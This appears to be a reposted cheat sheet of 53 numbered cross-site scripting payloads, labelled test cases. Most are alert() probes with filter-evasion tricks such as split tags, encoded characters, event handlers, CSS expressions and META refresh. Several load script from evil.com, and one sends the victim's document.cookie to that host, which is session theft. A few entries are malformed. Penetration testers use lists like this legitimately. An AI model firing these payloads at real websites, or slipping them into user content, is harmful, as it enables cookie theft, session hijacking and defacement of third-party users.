• XSS test cases


    1.<script> alert(1);</script>

    2.<script>alert('xss');</script>

    3.<script  src="http://www.evil.com/cookie.php"></script>

    4.<script>location.href="http://www.evil.com/cookies.php?cookie="+escape(document.cookie)"</script>

    5.<scr<script>ipt>alert('xss');</scr</script>ipt>

    6.<img src=liu.jpg onerror=alert(/xss/)/>

    7.<style>@import'javasc ipt:alert("xss")';</style>

    8.<?echo('<src)'; echo('ipt>alert("xss")';</script>');?>

    9.<marquee><script>alert('xss')</script></marquee>

    10.<IMG SRC="jav&#0x9;ascript:alert('xss');">

    11.<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

    12."><script>alert(1)</script>

    13.<script src=http://www.evil.com/files.js></script>

    14.</title><script>alert(/xss/)</script>

    15.</textarea><script>alert(/xss)</script>

    16.<IMG LOWSRC="javascript:alert('XSS')">

    17.<IMG DYNSRC="javascript:alert('XSS')">

    18.<font style='color:expression(alert(document.cookie))'>

    19.');alert('XSS

    20.<img src="javascript:alert('XSS')">

    21.[url=javascript:alert('XSS');]click me[/url]

    22.<body onunload="javascript:alert('XSS');">

    23.<body onLoad="alert('XSS');"

    24.[color=red' onmouseover="alert('XSS')"]mouse over[/color]

    25."/></a></><img src=1.gif onerror=alert(1)>

    26.window.alert("XSS");

    27.<div style="x:expression((window==1)?":eval('r=1;alert(String.fromCharCode(83,83,83));'))">

    28.<iframe<?php eval chr(11)?>onload=alert('XSS')></iframe>

    29."><script alert(String.fromCharCode(88,83,83))</script>

    30.'>><marquee><h1>XSS<h1></marquee>

    31.'">><script>alert('xss')</script>

    32.'">><marquee><h1>XSS</h1></marquee>

    33.<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

    34.<META HTTP-EQUIV="refresh"CONTENT="0;URL=http://;url=javascript:alert('XSS');">

    35.<script>var var=1; alert(var)</script>

    36.<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

    37.<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

    38.<IMG SRC='vbscript:msgbox("XSS")'>

    39."onfocus=alert(document.domain)"><"

    40.<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

    41.<STYLE>li {list-style-image:url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

    42.<br size="&{alert('xss')}">

    43.<scrscriptipt>alert(1)</scrscriptipt>

    44."><BODY onload!#$%&()*~+-_.,:;?@[/|]^`=alert("XSS")>

    45.[color=red width=expression(alert(123))][color]

    46.<BASE HREF="javascript:alert('XSS');//">

    47.Execute(MsgBox(chr(88)&&chr(83)&&chr(83)))<

    48."></iframe><script>alert(123)</script>

    49.<body onLoad="while(true) alert('XSS');">

    50."<marquee><img src=k.png onerror=alert(/xss/) />

    51.<div style="background:url('javascript:')

    52.<img src='java script:alert("XSS")'>

    53.>'"><img src="javascript:alert('xss')">

  • Original article: https://www.cnblogs.com/bl8ck/p/9610294.html